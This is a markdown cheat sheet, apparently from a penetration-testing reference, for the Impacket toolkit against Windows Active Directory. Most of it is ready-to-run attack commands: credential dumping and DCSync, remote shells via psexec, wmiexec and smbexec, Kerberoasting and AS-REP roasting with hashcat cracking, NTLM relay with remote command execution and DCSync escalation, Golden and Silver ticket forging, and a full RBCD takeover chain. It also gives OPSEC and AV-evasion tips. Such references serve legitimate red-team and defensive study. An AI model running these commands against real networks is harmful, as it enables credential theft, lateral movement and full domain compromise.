impacket.md (16981B)
1 --- 2 title: "Impacket" 3 description: "Impacket suite: secretsdump, psexec/wmiexec, GetUserSPNs, ntlmrelayx, ticketer, smbserver and more." 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: [active-directory, smb, credentials, lateral-movement] 7 tools: [Impacket] 8 difficulty: intermediate 9 updated: "2026-08-09" 10 source: "repo:Active-Directory/Impacket_Cheatsheet.md" 11 --- 12 13 # Impacket 14 15 The Python toolkit for Windows network protocol implementation and exploitation (SMB/RPC/LDAP/Kerberos). 16 17 > **Note —** On Kali the example scripts are installed with an `impacket-` prefix (e.g. `impacket-secretsdump`, `impacket-GetUserSPNs`). A pip install exposes them as the bare `*.py` names used below. Use whichever your environment provides. 18 19 ## Authentication Methods Summary 20 21 All Impacket tools support multiple authentication methods: 22 23 | Method | Syntax | Description | 24 |:-------|:-------|:------------| 25 | Password | `domain/user:password@target` | Standard credentials | 26 | NTLM Hash (PtH) | `-hashes LM:NT domain/user@target` | Pass-the-Hash | 27 | Kerberos Ticket (PtT) | `-k -no-pass domain/user@target` | Pass-the-Ticket (with `KRB5CCNAME` set) | 28 | AES Key | `-aesKey <key> domain/user@target` | Kerberos AES key | 29 | Null Session | `domain/''@target` or `-no-pass` | Anonymous/null auth | 30 31 ### Common Global Flags 32 33 | Flag | Purpose | 34 |:-----|:--------| 35 | `-dc-ip IP` | Domain Controller IP | 36 | `-dc-host HOST` | Domain Controller hostname | 37 | `-k` | Use Kerberos authentication | 38 | `-no-pass` | Don't prompt for password | 39 | `-hashes LM:NT` | Pass-the-Hash | 40 | `-aesKey KEY` | Use AES key | 41 | `-debug` | Enable debug output | 42 | `-target-ip IP` | Target IP when using Kerberos | 43 44 ## secretsdump.py 45 46 The crown jewel of Impacket. Extracts credentials from Windows systems via multiple methods: SAM database, LSA secrets, cached domain credentials, and NTDS.dit (the AD database). 47 48 How it works: 49 50 ```text 51 [1] Connects via SMB/RPC to the target 52 [2] Dumps the SAM hive (local accounts) 53 [3] Extracts LSA secrets (service account passwords, machine account keys) 54 [4] If targeting a DC: uses DRSUAPI (DCSync) or VSS to pull NTDS.dit 55 ``` 56 57 Common usage: 58 59 ```bash 60 # Remote dump with plaintext credentials 61 secretsdump.py domain.local/administrator:P@ssw0rd@10.10.10.10 62 63 # Remote dump with NTLM hash (Pass-the-Hash) 64 secretsdump.py -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10 65 66 # Remote dump with Kerberos ticket (Pass-the-Ticket) 67 export KRB5CCNAME=/path/to/ticket.ccache 68 secretsdump.py -k -no-pass domain.local/administrator@dc01.domain.local 69 70 # DCSync specific user only 71 secretsdump.py -just-dc-user krbtgt domain.local/administrator:P@ssw0rd@10.10.10.10 72 73 # DCSync NTLM hashes only (skip Kerberos keys) 74 secretsdump.py -just-dc-ntlm domain.local/administrator:P@ssw0rd@10.10.10.10 75 76 # Offline extraction from copied registry hives 77 secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL 78 79 # Offline extraction from NTDS.dit 80 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL 81 ``` 82 83 Key flags: 84 85 | Flag | Purpose | 86 |:-----|:--------| 87 | `-just-dc` | Only DCSync, skip SAM/LSA | 88 | `-just-dc-user USER` | DCSync single account | 89 | `-just-dc-ntlm` | DCSync NTLM only, no Kerberos keys | 90 | `-use-vss` | Use Volume Shadow Copy instead of DRSUAPI | 91 | `-exec-method {smbexec,wmiexec,mmcexec}` | Method for VSS commands | 92 | `-history` | Include password history | 93 | `-outputfile FILE` | Write output to file | 94 95 ## psexec.py 96 97 The classic remote execution method. Mimics Sysinternals PsExec by uploading a service binary to `ADMIN$` and registering it as a Windows service. 98 99 How it works: 100 101 ```text 102 [1] Authenticates to SMB on the target 103 [2] Uploads a service executable to ADMIN$ (C:\Windows) 104 [3] Connects to the Service Control Manager (SCM) via RPC 105 [4] Creates and starts a new service pointing to the uploaded binary 106 [5] Service connects back, providing an interactive shell 107 [6] On exit, stops/deletes the service and removes the binary 108 ``` 109 110 Common usage: 111 112 ```bash 113 # Interactive shell 114 psexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 115 116 # Execute single command 117 psexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 "ipconfig /all" 118 119 # Pass-the-Hash 120 psexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10 121 psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10 122 123 # Specify alternate executable (useful for AV evasion) 124 psexec.py -file /path/to/custom.exe domain.local/administrator:P@ssw0rd@10.10.10.10 125 126 # Use specific share 127 psexec.py -path C$ domain.local/administrator:P@ssw0rd@10.10.10.10 128 ``` 129 130 Key flags: 131 132 | Flag | Purpose | 133 |:-----|:--------| 134 | `-file FILE` | Use custom executable instead of default | 135 | `-path SHARE` | Use alternate share (default: ADMIN$) | 136 | `-service-name NAME` | Custom service name | 137 | `-remote-binary-name NAME` | Custom name for uploaded binary | 138 | `-codec CODEC` | Output encoding (e.g. utf-8, cp850) | 139 140 > **OPSEC —** High noise: creates files, services, and event logs; detected by most EDR. Consider `wmiexec.py` or `smbexec.py` for stealth. 141 142 ## wmiexec.py 143 144 Stealthier alternative to psexec. Uses Windows Management Instrumentation (WMI) for command execution. No binary dropped to disk. 145 146 How it works: 147 148 ```text 149 [1] Authenticates via DCOM/WMI 150 [2] Creates a Win32_Process to execute commands 151 [3] Output is written to a file in ADMIN$, read back via SMB, then deleted 152 [4] Semi-interactive shell (each command is a new process) 153 ``` 154 155 Common usage: 156 157 ```bash 158 # Interactive shell 159 wmiexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 160 161 # Execute single command 162 wmiexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 "whoami /priv" 163 164 # Pass-the-Hash 165 wmiexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10 166 167 # Kerberos authentication 168 export KRB5CCNAME=admin.ccache 169 wmiexec.py -k -no-pass administrator@dc01.domain.local 170 171 # Silently execute (no output retrieval) 172 wmiexec.py -silentcommand domain.local/administrator:P@ssw0rd@10.10.10.10 "powershell -enc BASE64..." 173 ``` 174 175 Key flags: 176 177 | Flag | Purpose | 178 |:-----|:--------| 179 | `-shell-type {cmd,powershell}` | Shell interpreter | 180 | `-silentcommand` | Execute without retrieving output | 181 | `-nooutput` | Don't attempt to retrieve command output | 182 | `-codec CODEC` | Output encoding | 183 | `-com-version MAJOR:MINOR` | DCOM version | 184 185 > **OPSEC —** No binary dropped to disk, but still creates a process and writes temporary files; WMI process creation is logged (Event ID 4688 if enabled). 186 187 ## smbexec.py 188 189 Another execution method using native Windows services. Unlike psexec, it doesn't upload a binary — instead it abuses the service binary path to execute commands directly. 190 191 How it works: 192 193 ```text 194 [1] Creates a service with the command embedded in the service binary path 195 [2] Example: %COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\output.txt 2^>^&1 196 [3] Starts the service (executes the command) 197 [4] Reads output from the created file 198 [5] Deletes the service 199 ``` 200 201 Common usage: 202 203 ```bash 204 # Interactive shell 205 smbexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 206 207 # Pass-the-Hash 208 smbexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10 209 210 # Specify execution mode 211 smbexec.py -mode SERVER domain.local/administrator:P@ssw0rd@10.10.10.10 212 ``` 213 214 Key flags: 215 216 | Flag | Purpose | 217 |:-----|:--------| 218 | `-mode {SHARE,SERVER}` | Output retrieval method | 219 | `-share SHARE` | Share for output (default: C$) | 220 | `-shell-type {cmd,powershell}` | Shell interpreter | 221 | `-service-name NAME` | Custom service name | 222 223 ## GetUserSPNs.py (Kerberoasting) 224 225 Extracts TGS tickets for accounts with Service Principal Names (SPNs) set. These tickets are encrypted with the service account's password hash and can be cracked offline. 226 227 How it works: 228 229 ```text 230 [1] Queries LDAP for accounts with servicePrincipalName attribute 231 [2] Requests TGS tickets for discovered SPNs via Kerberos 232 [3] Outputs tickets in crackable format (Hashcat/John) 233 ``` 234 235 Common usage: 236 237 ```bash 238 # Enumerate SPNs only 239 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 240 241 # Request tickets 242 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request 243 244 # Output to file in Hashcat format 245 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile kerberoast.txt 246 247 # Target specific user 248 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request-user sqlservice 249 250 # Using Pass-the-Hash 251 GetUserSPNs.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/user -dc-ip 10.10.10.10 -request 252 253 # Using Kerberos auth 254 export KRB5CCNAME=user.ccache 255 GetUserSPNs.py -k -no-pass -dc-host dc01.domain.local domain.local/user -request 256 ``` 257 258 Cracking the hashes: 259 260 ```bash 261 # Hashcat (TGS-REP, etype 23 / RC4) 262 hashcat -m 13100 kerberoast.txt wordlist.txt -r rules/best64.rule 263 264 # John 265 john --wordlist=wordlist.txt kerberoast.txt 266 ``` 267 268 Key flags: 269 270 | Flag | Purpose | 271 |:-----|:--------| 272 | `-request` | Request TGS tickets | 273 | `-request-user USER` | Target specific account | 274 | `-outputfile FILE` | Save tickets to file | 275 | `-usersfile FILE` | Check specific users from file | 276 | `-save` | Save tickets as ccache files | 277 278 ## GetNPUsers.py (AS-REP Roasting) 279 280 Targets accounts with "Do not require Kerberos pre-authentication" enabled. Requests AS-REP responses containing the user's encrypted timestamp (crackable offline). 281 282 How it works: 283 284 ```text 285 [1] Sends AS-REQ without pre-authentication data 286 [2] If the account doesn't require pre-auth, the KDC returns AS-REP 287 [3] The AS-REP contains encrypted data using the user's password hash 288 [4] Extract and crack offline 289 ``` 290 291 Common usage: 292 293 ```bash 294 # Check known user 295 GetNPUsers.py domain.local/targetuser -dc-ip 10.10.10.10 -no-pass 296 297 # Enumerate and request (requires valid creds) 298 GetNPUsers.py domain.local/user:password -dc-ip 10.10.10.10 -request 299 300 # Spray userlist (no auth required) 301 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat 302 303 # Output to file 304 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat -outputfile asrep.txt 305 ``` 306 307 Cracking the hashes: 308 309 ```bash 310 # Hashcat (AS-REP, etype 23 / RC4) 311 hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule 312 313 # John 314 john --wordlist=wordlist.txt asrep.txt 315 ``` 316 317 Key flags: 318 319 | Flag | Purpose | 320 |:-----|:--------| 321 | `-request` | Request AS-REP | 322 | `-usersfile FILE` | List of users to test | 323 | `-format {hashcat,john}` | Output format | 324 | `-outputfile FILE` | Save hashes to file | 325 | `-no-pass` | No password (required for unauthenticated enum) | 326 327 ## ntlmrelayx.py 328 329 Captures NTLM authentication and relays it to other services (SMB, LDAP, MSSQL, HTTP, IMAP, etc.). 330 331 How it works: 332 333 ```text 334 [1] Sets up rogue server(s) to capture authentication 335 [2] When a victim authenticates, relays the credential exchange to a target 336 [3] Uses the relayed session to perform actions (execute commands, dump hashes, modify AD, etc.) 337 ``` 338 339 Common usage: 340 341 ```bash 342 # Basic relay to SMB 343 ntlmrelayx.py -tf targets.txt -smb2support 344 345 # Relay and execute command 346 ntlmrelayx.py -tf targets.txt -smb2support -c "whoami > C:\\pwned.txt" 347 348 # Relay to LDAP and escalate via delegation (RBCD) 349 ntlmrelayx.py -t ldap://dc01.domain.local --delegate-access 350 351 # Relay to LDAP and add computer 352 ntlmrelayx.py -t ldap://dc01.domain.local --add-computer ATTACKER01 353 354 # Relay to LDAP and perform DCSync ACL abuse 355 ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user compromiseduser 356 357 # SOCKS proxy mode (keeps sessions alive) 358 ntlmrelayx.py -tf targets.txt -smb2support -socks 359 # Then use proxychains with other tools 360 361 # Serve a malicious WPAD file 362 ntlmrelayx.py -tf targets.txt -smb2support -wh attacker-wpad 363 364 # Relay IPv6 (combine with mitm6) 365 ntlmrelayx.py -6 -tf targets.txt -smb2support -wh wpad.domain.local 366 ``` 367 368 Key flags: 369 370 | Flag | Purpose | 371 |:-----|:--------| 372 | `-tf FILE` | File containing target hosts | 373 | `-t TARGET` | Single target URL | 374 | `-smb2support` | Enable SMB2 support | 375 | `-socks` | Enable SOCKS proxy for captured sessions | 376 | `-c COMMAND` | Command to execute on successful relay | 377 | `-e FILE` | Execute file on successful relay | 378 | `--delegate-access` | Create computer and set RBCD | 379 | `--escalate-user USER` | Add DCSync rights to user | 380 | `--add-computer` | Add a computer account | 381 | `-wh HOST` | WPAD host for redirect | 382 | `-6` | Enable IPv6 | 383 | `-i` | Interactive SMB shell | 384 385 Combining with Responder: 386 387 ```bash 388 # Terminal 1: Disable SMB/HTTP in Responder.conf, then: 389 responder -I eth0 390 391 # Terminal 2: 392 ntlmrelayx.py -tf targets.txt -smb2support -socks 393 ``` 394 395 ## getTGT.py / getST.py 396 397 Request Kerberos tickets for use with Pass-the-Ticket attacks. 398 399 ### getTGT.py - Request TGT 400 401 ```bash 402 # With password 403 getTGT.py domain.local/user:password -dc-ip 10.10.10.10 404 # Outputs: user.ccache 405 406 # With NTLM hash (Overpass-the-Hash) 407 getTGT.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/user -dc-ip 10.10.10.10 408 409 # With AES key 410 getTGT.py -aesKey <aes256_key> domain.local/user -dc-ip 10.10.10.10 411 ``` 412 413 ### getST.py - Request Service Ticket 414 415 ```bash 416 # Request ticket for specific SPN 417 getST.py -spn cifs/fileserver.domain.local -dc-ip 10.10.10.10 domain.local/user:password 418 419 # S4U2Self (impersonate user to self) 420 getST.py -spn cifs/target.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/machineaccount$:password 421 422 # S4U2Proxy (constrained delegation abuse) 423 getST.py -spn cifs/dc01.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/service:password 424 ``` 425 426 Using the tickets: 427 428 ```bash 429 # Set environment variable 430 export KRB5CCNAME=/path/to/user.ccache 431 432 # Use with any Impacket tool 433 wmiexec.py -k -no-pass user@target.domain.local 434 secretsdump.py -k -no-pass user@dc01.domain.local 435 smbclient.py -k -no-pass user@fileserver.domain.local 436 ``` 437 438 ## ticketer.py (Golden/Silver Tickets) 439 440 Forges Kerberos tickets for persistence or privilege escalation. 441 442 ### Golden Ticket 443 444 Requires: `krbtgt` hash, Domain SID. 445 446 ```bash 447 # Forge Golden Ticket for Administrator 448 ticketer.py -nthash <krbtgt_nthash> -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.local Administrator 449 450 # With AES key 451 ticketer.py -aesKey <krbtgt_aes256_key> -domain-sid S-1-5-21-... -domain domain.local Administrator 452 453 # With specific groups 454 ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain domain.local -groups 512,513,518,519,520 Administrator 455 ``` 456 457 ### Silver Ticket 458 459 Requires: Service account hash, Domain SID, target SPN. 460 461 ```bash 462 # Forge Silver Ticket for CIFS on specific host 463 ticketer.py -nthash <service_hash> -domain-sid S-1-5-21-... -domain domain.local -spn cifs/fileserver.domain.local Administrator 464 ``` 465 466 Using forged tickets: 467 468 ```bash 469 export KRB5CCNAME=Administrator.ccache 470 psexec.py -k -no-pass Administrator@dc01.domain.local 471 ``` 472 473 ## smbclient.py 474 475 Interactive SMB client for browsing shares and transferring files. 476 477 ```bash 478 # Connect to target 479 smbclient.py domain.local/user:password@10.10.10.10 480 ``` 481 482 Inside the shell: 483 484 ```text 485 # List shares 486 shares 487 488 # Navigate 489 use C$ 490 cd Windows 491 ls 492 pwd 493 494 # Download files 495 get ntds.dit 496 mget *.txt 497 498 # Upload files 499 put payload.exe 500 501 # File info 502 info file.txt 503 ``` 504 505 Key commands: 506 507 | Command | Purpose | 508 |:--------|:--------| 509 | `shares` | List available shares | 510 | `use SHARE` | Connect to a share | 511 | `ls` | List directory contents | 512 | `cd DIR` | Change directory | 513 | `get FILE` | Download file | 514 | `put FILE` | Upload file | 515 | `mget PATTERN` | Download multiple files | 516 | `cat FILE` | Display file contents | 517 | `info FILE` | File metadata | 518 | `rm FILE` | Delete file | 519 | `mkdir DIR` | Create directory | 520 521 ## rbcd.py (Resource-Based Constrained Delegation) 522 523 Configures RBCD to enable service impersonation attacks. 524 525 Attack chain: 526 527 ```text 528 [1] Have GenericWrite/GenericAll over a computer object 529 [2] Create or control a computer account (need its credentials) 530 [3] Configure RBCD to allow your controlled account to impersonate users to the target 531 [4] Request S4U2Self + S4U2Proxy tickets 532 [5] Access target as impersonated user 533 ``` 534 535 Usage: 536 537 ```bash 538 # Configure RBCD 539 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action write domain.local/user:password -dc-ip 10.10.10.10 540 541 # Read current RBCD config 542 rbcd.py -delegate-to TARGET$ -action read domain.local/user:password -dc-ip 10.10.10.10 543 544 # Remove RBCD 545 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action remove domain.local/user:password -dc-ip 10.10.10.10 546 ``` 547 548 Complete attack workflow: 549 550 ```bash 551 # 1. Add computer (if needed) 552 addcomputer.py -computer-name ATTACKER$ -computer-pass 'P@ssw0rd123' domain.local/user:password 553 554 # 2. Configure RBCD 555 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action write domain.local/user:password 556 557 # 3. Get impersonation ticket 558 getST.py -spn cifs/TARGET.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/ATTACKER$:'P@ssw0rd123' 559 560 # 4. Use ticket 561 export KRB5CCNAME=Administrator.ccache 562 secretsdump.py -k -no-pass TARGET.domain.local 563 ```